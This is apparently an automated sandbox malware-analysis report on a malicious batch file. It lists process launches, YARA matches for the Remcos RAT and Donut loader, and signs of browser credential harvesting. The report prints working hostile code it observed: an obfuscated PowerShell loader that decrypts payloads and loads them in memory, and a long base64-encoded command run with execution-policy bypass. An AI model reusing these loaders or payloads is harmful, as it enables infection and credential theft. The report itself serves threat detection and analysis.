Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004498E0	13_2_004498E0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044A886	13_2_0044A886
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0043DA09	13_2_0043DA09
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00438D5E	13_2_00438D5E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00449ED0	13_2_00449ED0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0041FE83	13_2_0041FE83
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00430F54	13_2_00430F54
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004050C2	16_2_004050C2
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004014AB	16_2_004014AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00405133	16_2_00405133
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004051A4	16_2_004051A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00401246	16_2_00401246
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_0040CA46	16_2_0040CA46
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00405235	16_2_00405235
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004032C8	16_2_004032C8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00401689	16_2_00401689
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00402F60	16_2_00402F60

Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 0044DDB0 appears 33 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00418555 appears 34 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004186B6 appears 58 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004188FE appears 88 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00413025 appears 79 times

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7332
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7332			Jump to behavior

Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.3689629684.000000000AA0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.3674098163.0000000006A82000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.3668466296.00000000066EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.powershell.exe.89d0000.4.raw.unpack, chnomklatz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.powershell.exe.6610aa0.1.raw.unpack, chnomklatz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.powershell.exe.99013e8.8.raw.unpack, chnomklatz.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.powershell.exe.89d0000.4.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.powershell.exe.89d0000.4.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.powershell.exe.6610aa0.1.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.powershell.exe.6610aa0.1.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.powershell.exe.99013e8.8.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.powershell.exe.99013e8.8.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winBAT@17/10@27/2

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

12_2_0041A225

Source: C:\Windows\SysWOW64\recover.exe

Code function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,

16_2_00410DE1

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

12_2_0041A6AF

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_00415799 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,

12_2_00415799

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_00416A46 FindResourceW,SizeofResource,LoadResource,LockResource,

12_2_00416A46

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\dwm.bat

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvmfia32.sx0.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z310517827.bat" "

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$evuto.CopyTo($avier);$evuto.Dispose();$pysls.Dispose();$avier.Dispose();$avier.ToArray();}function kjgun($param_var,$param2_var){$qhonl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$wstpn=$qhonl.EntryPoint;$wstpn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $jmdom;$uxzeu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jmdom).Split([Environment]::NewLine);foreach ($kbqsw in $uxzeu) {if ($kbqsw.StartsWith(':: ')){$hzwcr=$kbqsw.Substring(3);break;}}$gezfo=[string[]]$hzwcr.Split('\');$kcecj=ebqqx (zihtg ([Convert]::FromBase64String($gezfo[0])));$cutbf=ebqqx (zihtg ([Convert]::FromBase64String($gezfo[1])));kjgun $kcecj $null;kjgun $cutbf (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recycleb

Source: C:\Windows\SysWOW64\recover.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: recover.exe, recover.exe, 0000000D.00000002.1559064560.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: recover.exe, 0000000C.00000002.1572510923.00000000047CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: z310517827.bat

Virustotal: Detection: 9%

Source: C:\Windows\SysWOW64\recover.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_13-33246

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z310517827.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\z310517827.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ymieiytvun"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\bgnxiqeoiwifqy"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\z310517827.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXc